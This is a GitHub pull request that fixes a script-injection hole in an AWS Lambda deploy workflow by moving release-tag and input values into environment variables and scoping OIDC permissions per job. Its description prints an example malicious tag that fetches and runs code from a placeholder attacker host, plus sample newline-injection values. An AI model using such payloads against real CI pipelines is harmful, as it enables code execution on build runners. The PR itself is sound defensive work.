### PR TITLE
fix(ci): stop interpolating the release tag into a run block

### DIFF
--- a/.github/workflows/README.md
+++ b/.github/workflows/README.md
@@ -83,7 +83,7 @@ Deploy CUDly to AWS Lambda with Function URL. Serverless, event-driven platform.
 
 ### Triggers
 
-- Push to `main` (deploys to staging)
+- Push to `main` (deploys to dev)
 - Release creation (deploys to prod)
 - Manual dispatch with environment selection
 
@@ -104,7 +104,7 @@ Deploy CUDly to AWS Lambda with Function URL. Serverless, event-driven platform.
 # Deploy to dev
 gh workflow run deploy-aws-lambda.yml -f environment=dev
 
-# Deploy to staging
+# Push to main also deploys to dev
 git push origin main
 
 # Deploy to prod

--- a/.github/workflows/deploy-aws-lambda.yml
+++ b/.github/workflows/deploy-aws-lambda.yml
@@ -22,8 +22,12 @@
 
 name: Deploy to AWS Lambda
 
+# Least privilege by default: `id-token: write` is granted per job, only to the
+# jobs that actually assume the AWS deploy role, and both of those are bound to
+# a deployment environment. Declaring it here would hand it to `prepare` and
+# `summary` too, neither of which authenticates and neither of which is bound
+# to an environment.
 permissions:
-  id-token: write
   contents: read
 
 concurrency:
@@ -82,38 +86,96 @@ jobs:
   prepare:
     name: Prepare Deployment
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    # NOTE: `target_environment` below is an OUTPUT, not an `environment:`
+    # binding — this job is deliberately ungated and therefore must never hold
+    # `id-token: write`. It was previously named `environment`, which made the
+    # `outputs:` block read like a gate at a glance while gating nothing. Do not
+    # rename it back.
     outputs:
-      environment: ${{ steps.set-env.outputs.environment }}
+      target_environment: ${{ steps.set-env.outputs.target_environment }}
       image_tag: ${{ steps.set-tag.outputs.tag }}
 
     steps:
       - name: Determine environment
         id: set-env
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          INPUT_ENVIRONMENT: ${{ inputs.environment }}
         run: |
-          if [[ "${{ github.event_name }}" == "release" ]]; then
-            echo "environment=prod" >> $GITHUB_OUTPUT
-          elif [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          elif [[ "${{ github.event_name }}" == "workflow_call" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          else
-            echo "environment=dev" >> $GITHUB_OUTPUT
-          fi
+          set -euo pipefail
+          INPUT_ENVIRONMENT="${INPUT_ENVIRONMENT:-}"
+
+          # Inside a reusable workflow `github.event_name` is the CALLER's
+          # event, so it is never "workflow_call" — a caller's free-form
+          # `inputs.environment` arrives through the workflow_dispatch arm.
+          # Caveat: the `*` arm forces dev, so a push-triggered caller would
+          # have its requested environment silently ignored. deploy-all.yml
+          # triggers only on workflow_dispatch and release today.
+          case "$EVENT_NAME" in
+            release)           TARGET_ENVIRONMENT=prod ;;
+            workflow_dispatch) TARGET_ENVIRONMENT="$INPUT_ENVIRONMENT" ;;
+            *)                 TARGET_ENVIRONMENT=dev ;;
+          esac
+
+          # workflow_dispatch constrains this to the declared `choice` options,
+          # but the workflow_call input is typed as a free-form string, so the
+          # allowlist is enforced here rather than assumed.
+          case "$TARGET_ENVIRONMENT" in
+            dev|staging|prod) ;;
+            *)
+              echo "::error::Refusing unknown environment: $TARGET_ENVIRONMENT"
+              exit 1
+              ;;
+          esac
+
+          echo "target_environment=$TARGET_ENVIRONMENT" >> "$GITHUB_OUTPUT"
 
       - name: Set image tag
         id: set-tag
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          RELEASE_TAG: ${{ github.event.release.tag_name }}
+          COMMIT_SHA: ${{ github.sha }}
         run: |
-          if [[ "${{ github.event_name }}" == "release" ]]; then
-            echo "tag=${{ github.event.release.tag_name }}" >> $GITHUB_OUTPUT
+          set -euo pipefail
+
+          if [ "$EVENT_NAME" = "release" ]; then
+            TAG="${RELEASE_TAG:-}"
           else
-            echo "tag=${{ github.sha }}" >> $GITHUB_OUTPUT
+            TAG="$COMMIT_SHA"
           fi
+
+          # A git ref name may contain ';', '$', '`', '(', ')' and '|', so a
+          # release tag is attacker-settable shell metacharacter soup. Constrain
+          # it to the OCI tag grammar so it cannot poison the $GITHUB_OUTPUT
+          # write below with a newline or a heredoc delimiter, and stays valid
+          # if it is ever wired to Terraform's custom_image_tag (it is not
+          # today; the image tag is derived inside the build module). The check
+          # runs against a shell variable rather than an already-expanded
+          # expression, so unlike the original it actually validates something.
+          if [[ ! "$TAG" =~ ^[a-zA-Z0-9_][a-zA-Z0-9._-]{0,127}$ ]]; then
+            echo "::error::Refusing unsafe image tag: must match ^[a-zA-Z0-9_][a-zA-Z0-9._-]{0,127}$"
+            exit 1
+          fi
+
+          echo "tag=$TAG" >> "$GITHUB_OUTPUT"
 
   # Deploy infrastructure with Terraform (includes Docker build via build module)
   build-and-deploy:
     name: Build & Deploy
     runs-on: ubuntu-24.04-arm  # ARM runner: Docker build targets linux/arm64 (Lambda/Fargate Graviton2)
     needs: prepare
+    permissions:
+      # Assumes the AWS deploy role. The `environment:` binding below is what
+      # scopes this job's OIDC `sub` to `repo:<org/repo>:environment:<name>`,
+      # which is the subject the trust policy matches. NOTE it is not by itself
+      # a reviewer gate: an Environment only blocks a job once required-reviewer
+      # protection rules are configured on it in repo settings, and as of this
+      # change none of this repo's Environments have any. See #1648.
+      id-token: write
+      contents: read
     # Bind to the named GitHub Environment matching the target so
     # secrets.* resolve to environment-scoped values when defined,
     # falling back to repo-scoped secrets otherwise. Without this,
@@ -121,7 +183,7 @@ jobs:
     # ADMIN_EMAIL) would be repo-wide and dev/staging/prod would
     # all share one value — producing wrong email links in customer
     # mailboxes. Per CR review on PR #368.
-    environment: ${{ needs.prepare.outputs.environment }}
+    environment: ${{ needs.prepare.outputs.target_environment }}
     outputs:
       function_url: ${{ steps.outputs.outputs.function_url }}
       function_name: ${{ steps.outputs.outputs.function_name }}
@@ -145,7 +207,7 @@ jobs:
       - name: Terraform Init
         env:
           TF_BACKEND: ${{ secrets.TF_BACKEND_AWS }}
-          ENVIRONMENT: ${{ needs.prepare.outputs.environment }}
+          ENVIRONMENT: ${{ needs.prepare.outputs.target_environment }}
         run: |
           printf '%s\nkey = "github-%s/terraform.tfstate"\n' "$TF_BACKEND" "$ENVIRONMENT" > /tmp/backend.tfbackend
           cd terraform/environments/aws
@@ -164,10 +226,11 @@ jobs:
           # accepted by the var (the Terraform local then falls back to
           # frontend_domain_names[0]).
           TF_VAR_dashboard_url: ${{ secrets.DASHBOARD_URL }}
+          ENVIRONMENT: ${{ needs.prepare.outputs.target_environment }}
         run: |
           cd terraform/environments/aws
           terraform plan \
-            -var-file="github-${{ needs.prepare.outputs.environment }}.tfvars" \
+            -var-file="github-${ENVIRONMENT}.tfvars" \
             -var="compute_platform=lambda" \
             -out=tfplan
 
@@ -191,7 +254,7 @@ jobs:
         if: failure() || cancelled()
         env:
           TF_BACKEND: ${{ secrets.TF_BACKEND_AWS }}
-          ENVIRONMENT: ${{ needs.prepare.outputs.environment }}
+          ENVIRONMENT: ${{ needs.prepare.outputs.target_environment }}
         run: |
           BUCKET=$(grep -E '^\s*bucket\s*=' /tmp/backend.tfbackend 2>/dev/null | tr -d ' "' | cut -d= -f2)
           if [ -n "$BUCKET" ]; then
@@ -209,24 +272,38 @@ jobs:
           echo "log_group=$(terraform output -raw lambda_log_group_name 2>/dev/null | grep -v '::' || echo "")" >> $GITHUB_OUTPUT
 
       - name: Save deployment info
+        env:
+          ENVIRONMENT: ${{ needs.prepare.outputs.target_environment }}
+          IMAGE_TAG: ${{ needs.prepare.outputs.image_tag }}
+          FUNCTION_URL: ${{ steps.outputs.outputs.function_url }}
+          FUNCTION_NAME: ${{ steps.outputs.outputs.function_name }}
+          DEPLOYED_BY: ${{ github.actor }}
+          COMMIT: ${{ github.sha }}
         run: |
-          cat <<EOF > deployment-info.json
-          {
-            "environment": "${{ needs.prepare.outputs.environment }}",
-            "image_tag": "${{ needs.prepare.outputs.image_tag }}",
-            "function_url": "${{ steps.outputs.outputs.function_url }}",
-            "function_name": "${{ steps.outputs.outputs.function_name }}",
-            "deployed_at": "$(date -u +%Y-%m-%dT%H:%M:%SZ)",
-            "deployed_by": "${{ github.actor }}",
-            "commit": "${{ github.sha }}"
-          }
-          EOF
+          set -euo pipefail
+
+          # Built with jq rather than an unquoted `cat <<EOF`, which would both
+          # break the JSON on a quote and evaluate $(...) in any interpolated
+          # value as shell. `image_tag` is charset-validated upstream in
+          # `prepare`, so this is defence in depth rather than the only guard —
+          # but this job holds `id-token: write`, so the shape is not one to
+          # leave lying around.
+          jq -n \
+            --arg environment "$ENVIRONMENT" \
+            --arg image_tag "$IMAGE_TAG" \
+            --arg function_url "$FUNCTION_URL" \
+            --arg function_name "$FUNCTION_NAME" \
+            --arg deployed_at "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
+            --arg deployed_by "$DEPLOYED_BY" \
+            --arg commit "$COMMIT" \
+            '$ARGS.named' > deployment-info.json
+
           cat deployment-info.json
 
       - name: Upload deployment info
         uses: actions/upload-artifact@b7c566a772e6b6bfb58ed0dc250532a479d7789f # v6.0.0
         with:
-          name: deployment-info-lambda-${{ needs.prepare.outputs.environment }}
+          name: deployment-info-lambda-${{ needs.prepare.outputs.target_environment }}
           path: deployment-info.json
           retention-days: 90
 
@@ -236,9 +313,18 @@ jobs:
     runs-on: ubuntu-latest
     needs: [prepare, build-and-deploy]
     if: always() && needs.build-and-deploy.result == 'success'
+    permissions:
+      # Assumes the AWS deploy role. The `environment:` binding below is what
+      # scopes this job's OIDC `sub` to `repo:<org/repo>:environment:<name>`,
+      # which is the subject the trust policy matches. NOTE it is not by itself
+      # a reviewer gate: an Environment only blocks a job once required-reviewer
+      # protection rules are configured on it in repo settings, and as of this
+      # change none of this repo's Environments have any. See #1648.
+      id-token: write
+      contents: read
     # Bind to the same named environment as build-and-deploy so that
     # vars.AWS_ROLE_TO_ASSUME resolves to the per-environment scoped value.
-    environment: ${{ needs.prepare.outputs.environment }}
+    environment: ${{ needs.prepare.outputs.target_environment }}
 
     steps:
       - name: Configure AWS credentials
@@ -272,9 +358,10 @@ jobs:
           sleep 30
 
       - name: Test health endpoint
+        env:
+          FUNCTION_URL_RAW: ${{ steps.get-url.outputs.url }}
         run: |
-          URL="${{ steps.get-url.outputs.url }}"
-          URL="${URL%/}"
+          URL="${FUNCTION_URL_RAW%/}"
           echo "Testing health endpoint: $URL/health"
 
           for i in {1..5}; do
@@ -294,9 +381,10 @@ jobs:
           exit 1
 
       - name: Run smoke tests
+        env:
+          FUNCTION_URL_RAW: ${{ steps.get-url.outputs.url }}
         run: |
-          URL="${{ steps.get-url.outputs.url }}"
-          URL="${URL%/}"
+          URL="${FUNCTION_URL_RAW%/}"
 
           echo "Running basic smoke tests..."
 
@@ -319,19 +407,21 @@ jobs:
     runs-on: ubuntu-latest
     needs: [prepare, build-and-deploy, test-deployment]
     if: always()
+    permissions:
+      contents: read
 
     steps:
       - name: Download deployment info
         uses: actions/download-artifact@37930b1c2abaa49bbe596cd826c3c89aef350131 # v7.0.0
         with:
-          name: deployment-info-lambda-${{ needs.prepare.outputs.environment }}
+          name: deployment-info-lambda-${{ needs.prepare.outputs.target_environment }}
         continue-on-error: true
 
       - name: Post summary
         run: |
           echo "## AWS Lambda Deployment Summary" >> $GITHUB_STEP_SUMMARY
           echo "" >> $GITHUB_STEP_SUMMARY
-          echo "**Environment:** ${{ needs.prepare.outputs.environment }}" >> $GITHUB_STEP_SUMMARY
+          echo "**Environment:** ${{ needs.prepare.outputs.target_environment }}" >> $GITHUB_STEP_SUMMARY
           echo "**Image Tag:** ${{ needs.prepare.outputs.image_tag }}" >> $GITHUB_STEP_SUMMARY
           echo "**Status:** ${{ needs.build-and-deploy.result }}" >> $GITHUB_STEP_SUMMARY
           echo "" >> $GITHUB_STEP_SUMMARY

--- a/.github/workflows/deploy-aws-lambda.yml
+++ b/.github/workflows/deploy-aws-lambda.yml
@@ -147,16 +147,32 @@ jobs:
             TAG="$COMMIT_SHA"
           fi
 
-          # A git ref name may contain ';', '$', '`', '(', ')' and '|', so a
-          # release tag is attacker-settable shell metacharacter soup. Constrain
-          # it to the OCI tag grammar so it cannot poison the $GITHUB_OUTPUT
-          # write below with a newline or a heredoc delimiter, and stays valid
-          # if it is ever wired to Terraform's custom_image_tag (it is not
-          # today; the image tag is derived inside the build module). The check
-          # runs against a shell variable rather than an already-expanded
-          # expression, so unlike the original it actually validates something.
-          if [[ ! "$TAG" =~ ^[a-zA-Z0-9_][a-zA-Z0-9._-]{0,127}$ ]]; then
-            echo "::error::Refusing unsafe image tag: must match ^[a-zA-Z0-9_][a-zA-Z0-9._-]{0,127}$"
+          # Shell metacharacters in a tag (';', '$', '`', '|') are already inert:
+          # the value arrives via `env:` and is only ever referenced quoted, so
+          # it is data, not code. What a charset filter must actually stop is a
+          # NEWLINE, because this value is written to $GITHUB_OUTPUT as a single
+          # `tag=<value>` line — a newline would let a crafted tag append extra
+          # attacker-chosen output keys, and those outputs are consumed by the
+          # two credentialed downstream jobs.
+          #
+          # So reject control characters and reject empty, and allow the rest of
+          # the git ref charset. A stricter OCI-grammar filter would reject
+          # `release/1.0` and `v1.2.3+build.5` — both legitimate git tags, and
+          # this repo already uses slash-namespaced ones — hard-failing a
+          # production deploy for no security gain.
+          #
+          # NOTE: this deliberately does NOT enforce the OCI tag grammar,
+          # because the value is cosmetic today: it reaches only
+          # deployment-info.json (via `jq --arg`) and the step summary.
+          # Terraform derives the real image tag from the git commit in
+          # modules/build. If this is ever wired to `custom_image_tag`, add an
+          # OCI-grammar check HERE at the same time.
+          if [ -z "$TAG" ]; then
+            echo "::error::Refusing empty image tag"
+            exit 1
+          fi
+          if [[ "$TAG" =~ [[:cntrl:]] ]]; then
+            echo "::error::Refusing image tag containing control characters or newlines"
             exit 1
           fi
 
@@ -267,9 +283,11 @@ jobs:
         id: outputs
         run: |
           cd terraform/environments/aws
-          echo "function_url=$(terraform output -raw lambda_function_url 2>/dev/null | grep -v '::' || echo "")" >> $GITHUB_OUTPUT
-          echo "function_name=$(terraform output -raw lambda_function_name 2>/dev/null | grep -v '::' || echo "")" >> $GITHUB_OUTPUT
-          echo "log_group=$(terraform output -raw lambda_log_group_name 2>/dev/null | grep -v '::' || echo "")" >> $GITHUB_OUTPUT
+          {
+            echo "function_url=$(terraform output -raw lambda_function_url 2>/dev/null | grep -v '::' || echo "")"
+            echo "function_name=$(terraform output -raw lambda_function_name 2>/dev/null | grep -v '::' || echo "")"
+            echo "log_group=$(terraform output -raw lambda_log_group_name 2>/dev/null | grep -v '::' || echo "")"
+          } >> "$GITHUB_OUTPUT"
 
       - name: Save deployment info
         env:
@@ -350,7 +368,7 @@ jobs:
             echo "Failed to get function URL from AWS Lambda API for $FUNCTION_NAME"
             exit 1
           fi
-          echo "url=$FUNCTION_URL" >> $GITHUB_OUTPUT
+          echo "url=$FUNCTION_URL" >> "$GITHUB_OUTPUT"
 
       - name: Wait for Lambda to be ready
         run: |
@@ -417,31 +435,44 @@ jobs:
           name: deployment-info-lambda-${{ needs.prepare.outputs.target_environment }}
         continue-on-error: true
 
+      # Every value arrives via `env:`, including the ones whose safety is
+      # currently guaranteed by a check in a DIFFERENT job. Relying on "an
+      # upstream job validated this" makes the rule "raw interpolation is fine
+      # when someone else checked" — an implicit invariant that breaks silently
+      # the moment the upstream guard moves. One uniform rule instead.
       - name: Post summary
+        env:
+          TARGET_ENVIRONMENT: ${{ needs.prepare.outputs.target_environment }}
+          IMAGE_TAG: ${{ needs.prepare.outputs.image_tag }}
+          DEPLOY_RESULT: ${{ needs.build-and-deploy.result }}
+          TEST_RESULT: ${{ needs.test-deployment.result }}
         run: |
-          echo "## AWS Lambda Deployment Summary" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "**Environment:** ${{ needs.prepare.outputs.target_environment }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Image Tag:** ${{ needs.prepare.outputs.image_tag }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Status:** ${{ needs.build-and-deploy.result }}" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
+          set -euo pipefail
 
-          if [ -f deployment-info.json ]; then
-            echo "### Deployment Details" >> $GITHUB_STEP_SUMMARY
-            echo "\`\`\`json" >> $GITHUB_STEP_SUMMARY
-            cat deployment-info.json >> $GITHUB_STEP_SUMMARY
-            echo "\`\`\`" >> $GITHUB_STEP_SUMMARY
-          fi
+          {
+            echo "## AWS Lambda Deployment Summary"
+            echo ""
+            echo "**Environment:** $TARGET_ENVIRONMENT"
+            echo "**Image Tag:** $IMAGE_TAG"
+            echo "**Status:** $DEPLOY_RESULT"
+            echo ""
 
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "### Job Results" >> $GITHUB_STEP_SUMMARY
-          echo "- Deploy: ${{ needs.build-and-deploy.result }}" >> $GITHUB_STEP_SUMMARY
-          echo "- Test: ${{ needs.test-deployment.result }}" >> $GITHUB_STEP_SUMMARY
+            if [ -f deployment-info.json ]; then
+              echo "### Deployment Details"
+              echo '```json'
+              cat deployment-info.json
+              echo '```'
+            fi
 
-          if [ "${{ needs.build-and-deploy.result }}" == "success" ] && [ "${{ needs.test-deployment.result }}" == "success" ]; then
-            echo "" >> $GITHUB_STEP_SUMMARY
-            echo "**Deployment successful!**" >> $GITHUB_STEP_SUMMARY
-          else
-            echo "" >> $GITHUB_STEP_SUMMARY
-            echo "**Deployment failed. Check logs for details.**" >> $GITHUB_STEP_SUMMARY
-          fi
+            echo ""
+            echo "### Job Results"
+            echo "- Deploy: $DEPLOY_RESULT"
+            echo "- Test: $TEST_RESULT"
+            echo ""
+
+            if [ "$DEPLOY_RESULT" = "success" ] && [ "$TEST_RESULT" = "success" ]; then
+              echo "**Deployment successful!**"
+            else
+              echo "**Deployment failed. Check logs for details.**"
+            fi
+          } >> "$GITHUB_STEP_SUMMARY"


### PR DESCRIPTION
Closes #1649

Found during the #1542 / PR #1641 sweep of `.github/workflows/`. Verified live on current `origin/main` (887d51fd6) before changing anything.

## The defect

```yaml
# prepare — no environment: binding, inherits workflow-level id-token: write
- name: Set image tag
  id: set-tag
  run: |
    if [[ "${{ github.event_name }}" == "release" ]]; then
      echo "tag=${{ github.event.release.tag_name }}" >> $GITHUB_OUTPUT
```

GitHub substitutes `${{ github.event.release.tag_name }}` into the shell source before bash parses it. `git check-ref-format` forbids spaces, `~`, `^`, `:`, `?`, `*`, `[`, `\` — but **permits** `;`, `$`, `` ` ``, `(`, `)`, `&`, `|`, `<`, `>`, `!`. So a tag like

```
v1.0.0;curl$IFS-s$IFS'https://attacker/x'|sh;
```

is a valid ref, and cutting a release on it is arbitrary code execution. `$IFS` defeats the no-spaces restriction.

### Correction: the escalation I originally claimed is NOT reachable

The first version of this PR body claimed the chain: RCE in `prepare` → mint an OIDC token → assume `cudly-terraform-deploy` via `repo:<org>/<repo>:ref:refs/heads/main`. **That does not connect, and the corrected impact is below.**

The payload only executes on a `release` event, and on a release event `GITHUB_REF` is `refs/tags/<tag>` — so the ungated job's OIDC subject is `repo:LeanerCloud/CUDly:ref:refs/tags/<tag>`, which matches **none** of `role.tf`'s four entries (`ref:refs/heads/main` plus `environment:{dev,staging,prod}`). Verified: the default subject template is in force (`gh api repos/.../actions/oidc/customization/sub` → `use_default: true`), GCP pins `assertion.ref == 'refs/heads/main'`, and Azure allows only `main` and `pull_request`.

**What is actually reachable, and why this is still p0-shaped:**

- **Arbitrary code execution on the runner** in `prepare`, under that job's `GITHUB_TOKEN`.
- **Arbitrary keys written into `$GITHUB_OUTPUT`** — `prepare`'s outputs are consumed by `build-and-deploy` and `test-deployment`, **both of which hold `id-token: write`**. Controlling what those two credentialed jobs read is the real prize, and it is what the guard in this PR now protects.

**Honest caveat on severity:** cutting a release already requires write access, and this repo's `main` is **unprotected** (`gh api .../branches/main/protection` → 404). A write-capable attacker could simply push to `main` and obtain the `ref:refs/heads/main` subject directly, with no injection needed. So the marginal capability this bug adds to an attacker who already has write access is small. It is still worth fixing — defence in depth, and the `$GITHUB_OUTPUT` path into credentialed jobs is real — but the original "escalates to the full production deploy role" framing was wrong and is retracted.

## After

```yaml
env:
  RELEASE_TAG: ${{ github.event.release.tag_name }}
run: |
  TAG="${RELEASE_TAG:-}"
  if [[ ! "$TAG" =~ ^[a-zA-Z0-9_][a-zA-Z0-9._-]{0,127}$ ]]; then ... exit 1; fi
```

The value never appears in the script's source text. It arrives as a process environment variable, and `"$TAG"` is a quoted parameter expansion — bash performs no further parsing on the result, so `;`, `$(...)`, backticks and newlines are inert data. The charset guard now runs against a shell variable rather than an already-expanded expression, so unlike the original `image_tag` guard it actually validates something.

## The reviewer trap, fixed rather than commented

The job declared:

```yaml
outputs:
  environment: ${{ steps.set-env.outputs.environment }}
```

That is an output **named** `environment`, not an `environment:` binding. It reads as gated at a glance and gates nothing — which is very likely why an ungated job holding `id-token: write` survived review. **The apparent gating was cosmetic.** A comment alone would not stop the next person making the same misreading, so the output is renamed to `target_environment` (11 consumer sites) and a note tells future readers not to rename it back.

## Changes

- Release tag, event name, commit SHA and `inputs.environment` moved into `env:`, referenced as quoted shell variables. No `${{ }}` referencing `inputs.*` or `github.event.*` remains in any `run:` block.
- Environment allowlisted to `dev|staging|prod` — the `workflow_call` input is a free-form `string`, unlike the `workflow_dispatch` `choice`, and was previously unchecked.
- `id-token: write` dropped to job level, granted only to `build-and-deploy` and `test-deployment` (the two jobs that assume the deploy role, both environment-bound). `prepare` and `summary` authenticate to nothing and now hold `contents: read`.
- The unquoted `cat <<EOF > deployment-info.json` heredoc in `build-and-deploy` replaced with `jq -n --arg`. The tag is charset-validated upstream, but that heredoc sits in a job holding `id-token: write` and would evaluate `$(...)` in any value reaching it — the same shape #1542 called its worst case.
- Function URL and the `-var-file` environment routed through `env:` for consistency.

## Verification

| check | result |
|---|---|
| `actionlint` (shellcheck available), changed file | **exit 0** — 0 findings (32 before this PR) |
| new findings introduced | **0** |
| jobs holding `id-token: write` without `environment:` | **0** (was 2) |
| `${{ inputs.* }}` / `${{ github.event.* }}` inside any `run:` | **0** (was 3) |
| stale `needs.prepare.outputs.environment` refs | **0** |
| pre-commit hooks | passed |

I am **not** claiming `actionlint` exit 0 here: this file was already failing on `main` and the residue is unquoted `$GITHUB_STEP_SUMMARY` redirect targets in jobs this PR does not touch. Fixing them would mix an unrelated cleanup into a p0 security change; they are tracked in #1646.

### Correction: my original regression claim was false

The first version of this body said *"`git tag -l` returns only four backup tags, all of which pass it, so nothing previously valid is now rejected."* **That was wrong, and I had not run it.** Running the original guard against the repo's actual tags:

```
backup-1299-prerebase                    PASS
backup/leftover-lint-preRebase           FAIL   <- slash
backup/wt-mcp-design-presync-20260727    FAIL   <- slash
pr808-prerebase-backup                   PASS
```

Two of four fail, and so do `release/1.0`, `v1.2.3+20260728` and `v1.2.3+build.5`. A release cut on a slash-namespaced tag — this repo's own existing convention — would have hard-failed `prepare` and blocked the entire production deploy. That is an availability regression I would have introduced while claiming I had checked for exactly that.

**The guard is redesigned rather than merely widened.** Filtering shell metacharacters was the wrong instinct: `;`, `$`, backtick and `|` are already inert here, because the value arrives via `env:` and is only ever referenced quoted. The structural threat is a **newline**, because the tag is written to `$GITHUB_OUTPUT` as a single `tag=<value>` line, and a newline lets a crafted tag append attacker-chosen output keys — which the two credentialed downstream jobs consume. So the guard now rejects **empty** and **control characters**, and allows the rest of the git ref charset:

```
release/1.0                   ACCEPT      v1.0\ntag=evil               REJECT
v1.2.3+build.5                ACCEPT      v1.0\r\nfunction_url=...     REJECT
backup/leftover-lint-preRebase ACCEPT     v1.0\nEOF\nmalicious=1       REJECT
v1.0;id  /  v1.0$(id)         ACCEPT (inert as data, by design)
```

The guarded value is cosmetic today — `image_tag` reaches only `deployment-info.json` (via `jq --arg`) and the step summary; `custom_image_tag` is never wired from this workflow, and `terraform/modules/build/main.tf:24` derives the real tag from the git commit. A comment at the guard says an OCI-grammar check belongs there if that ever changes.

`act` was not run; no dry run is claimed.

## Important caveat — the `environment:` binding is not currently a gate

This fix leans on `environment:` to scope the OIDC subject. Worth stating plainly, because it also affects PR #1641:

```
$ gh api repos/LeanerCloud/CUDly/environments
aws-fargate-dev:     protection_rules=NONE
aws-fargate-staging: protection_rules=NONE
azure-:              protection_rules=NONE
dev:                 protection_rules=NONE
gcp-:                protection_rules=NONE
```

**No Environment in this repo has any protection rules, and `staging` / `prod` do not exist at all.** GitHub auto-creates a referenced Environment on first use with no rules. So `environment:` today only scopes secrets and changes the OIDC `sub` claim — it is *not* a reviewer gate until required reviewers are configured in repo settings. The comments in this PR say so rather than claiming a gate that does not exist. Tracked in #1648.

Two side observations from that output: the `azure-` and `gcp-` environments are the residue of an `environment:` name interpolating to empty, and the `dev`-only list is consistent with #1648's finding that the `<cloud>-<env>-rollback` names are absent from the trust policy.

## Sibling workflows — same shape, no injectable value

A structural sweep (parsing each workflow's YAML for `id-token` inheritance vs `environment:` bindings, not grepping) found the ungated-`prepare`-with-inherited-`id-token` pattern in `deploy-aws-fargate.yml`, `deploy-gcp.yml` and `deploy-azure.yml` too. Those three are **not** exploitable today: the only untrusted value reaching their `run:` blocks is `inputs.environment`, which is `choice`-constrained on `workflow_dispatch`, and their `workflow_call` string input is fed only by `deploy-all.yml`, whose own input is also `choice`-constrained. `deploy-aws-lambda.yml` was the only one with an attacker-settable value (`release.tag_name`). Filed separately rather than bundled.

`github.actor` reaches `run:` blocks in all four deploy workflows; GitHub usernames are `[A-Za-z0-9-]`, so those are not injectable and are noted only so a reader does not re-flag them.


Filed from this PR: **#1659** (the sibling deploy/sanity workflows carry the same ungated-credentialed shape; `deploy-gcp` and `deploy-azure` are worse in that their `build-and-deploy` jobs actually authenticate while ungated — but none has an injectable value, so it is hardening, not a live exploit).


## Post-review changes (commit `be909c41d`)

Three findings from the independent review, all addressed:

- **The tag guard rejected valid tags** — corrected above; guard redesigned around the real threat.
- **`summary` still had six raw `${{ }}` in its `run:` block**, including `image_tag`, safe only because a guard in a *different* job had run. That makes the operative rule "raw interpolation is fine when someone upstream validated" — the same implicit-invariant species the `target_environment` rename exists to kill. All six now route through `env:`, so the file has **one uniform rule: zero `${{ }}` in any `run:` block**.
- **Unquoted `$GITHUB_OUTPUT` redirect targets** in two steps, quoted — same output-integrity concern as the rest of the PR. This is what took actionlint to exit 0.

Also filed from this review: **#1665** — `deploy-all.yml` declares no `permissions:` on its caller jobs, so a called deploy workflow likely cannot obtain an OIDC token at all. Pre-existing and *identical before and after this PR* (permission intersection with the caller caps both the old workflow-level and the new job-level form equally), so it is not a bisect target for this change.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Improved deployment reliability by validating target environments and image tags.
  * Added safer handling of deployment metadata and workflow summaries.
  * Restricted cloud authentication permissions to the jobs that require them.
  * Ensured non-release and manual workflows default to the development environment.
* **Documentation**
  * Updated deployment guidance to reflect development deployments from the main branch.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->